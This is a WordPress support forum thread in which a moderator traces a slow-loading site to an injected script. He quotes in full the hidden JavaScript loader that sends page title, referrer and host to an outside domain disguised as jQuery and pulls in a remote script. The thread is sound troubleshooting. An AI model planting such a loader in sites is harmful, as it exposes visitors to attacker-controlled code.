• Resolved prnethost

    (@prnethost)


    Hello, from week ago my wordpress site is very slow to open the site. It tooks more than 1 minute to load and display.
    But when I access to admin of wordpress is fine, I navigate and add posts pretty fast.
    I already to disable all plugins. I even already try to use the default theme of wordpress, but stills open very slow.

    My site is http://www.webmasterlinuxcpanel.net.br. I already checked with webmaster server and it is not from load on server or something like that because other sites on the server are opening fine.

    I also try to install some plugins in order to speed up, but no one worked. Anyone have any idea what is be the problem?
    Just to remember, the admin of wordpress is loading fine. Only the main site is very slow to open.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    It’s this part on line 171 of your HTML.

    <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://acctms.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
    </head>

    Something is attempting to load that http://acctms.com/js/jquery.min.php and frankly that’s very suspicious.

    What’s adding that?

    Thread Starter prnethost

    (@prnethost)

    Hello thanks for the reply. You mean that is a part on my HTML file. But what file do you mean? I did not find any html file inside the folder /portal.

    Thread Starter prnethost

    (@prnethost)

    Ok thanks for the help it was really that.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘WordPress very slow, but admin is fine’ is closed to new replies.